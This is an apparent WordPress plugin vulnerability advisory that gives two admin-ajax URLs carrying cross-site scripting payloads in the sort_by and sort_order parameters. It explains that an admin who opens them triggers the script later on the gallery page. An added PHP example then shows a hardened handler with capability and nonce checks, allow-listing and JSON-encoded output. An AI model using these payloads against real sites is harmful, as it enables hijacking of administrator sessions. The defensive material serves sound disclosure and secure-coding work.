## https://sploitus.com/exploit?id=WPEX-ID:89656CB3-4611-4AE7-B7F8-1B22EB75CFC4
Make a logged-in admin open one of the URLs below:

https://example.com/wp-admin/admin-ajax.php?action=addMusic&sort_by=%22;alert(/XSS/);%22
https://example.com/wp-admin/admin-ajax.php?action=addMusic&sort_by=size&sort_order=%22;alert(/XSS-order/);%22

Even though the requests above return a "Sorry, your nonce did not verify." error, the XSS payload still triggers when an admin attempts to add a new image to a gallery.
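The advisory implies that the sort parameters are stored even though the nonce check fails, and are later echoed into a JavaScript string on the gallery page. A hardened handler for that pattern, added here as an example and not the affected plugin's code (the action and parameter names come from the advisory; the nonce name, option name, capability and allowed sort values are assumptions):

```php
<?php
// Added example, not the affected plugin's code. A hypothetical admin-ajax
// handler for the addMusic action that stores sort_by / sort_order (names taken
// from the advisory) and later renders them into inline JavaScript.
// Fixes applied: nonce and capability are checked before any state changes,
// the values are allow-listed, and the render step JSON-encodes them.

const EXAMPLE_ALLOWED_SORT_BY    = array( 'title', 'date', 'size' ); // assumed allow-list
const EXAMPLE_ALLOWED_SORT_ORDER = array( 'asc', 'desc' );

function example_add_music_handler() {
    // 1. Authorisation first. check_ajax_referer() dies on failure, so a forged
    //    link opened by an admin cannot reach the code that saves the values.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( 'insufficient privileges', 403 );
    }
    check_ajax_referer( 'example_add_music_nonce', 'nonce' ); // nonce action/field names are assumptions

    // 2. Allow-list rather than sanitise: a sort key is an enum, not free text.
    $sort_by    = isset( $_POST['sort_by'] ) ? sanitize_key( wp_unslash( $_POST['sort_by'] ) ) : 'date';
    $sort_order = isset( $_POST['sort_order'] ) ? sanitize_key( wp_unslash( $_POST['sort_order'] ) ) : 'asc';
    if ( ! in_array( $sort_by, EXAMPLE_ALLOWED_SORT_BY, true ) ) {
        wp_send_json_error( 'invalid sort_by', 400 );
    }
    if ( ! in_array( $sort_order, EXAMPLE_ALLOWED_SORT_ORDER, true ) ) {
        wp_send_json_error( 'invalid sort_order', 400 );
    }

    update_option( 'example_gallery_sort', array( 'by' => $sort_by, 'order' => $sort_order ) );
    wp_send_json_success();
}
add_action( 'wp_ajax_addMusic', 'example_add_music_handler' );

// 3. When the stored values reach the gallery page, emit them as JSON so a quote
//    or "</script>" in the data can never break out of the string context.
function example_render_gallery_sort_script() {
    $opts = get_option( 'example_gallery_sort', array( 'by' => 'date', 'order' => 'asc' ) );
    printf(
        '<script>var galleryOpts = %s;</script>',
        wp_json_encode( $opts, JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT )
    );
}
```

The payload in the advisory relies on a double quote closing the JS string; with the allow-list it is rejected before storage, and with the JSON-encoded output it would be rendered inert even if it reached the page.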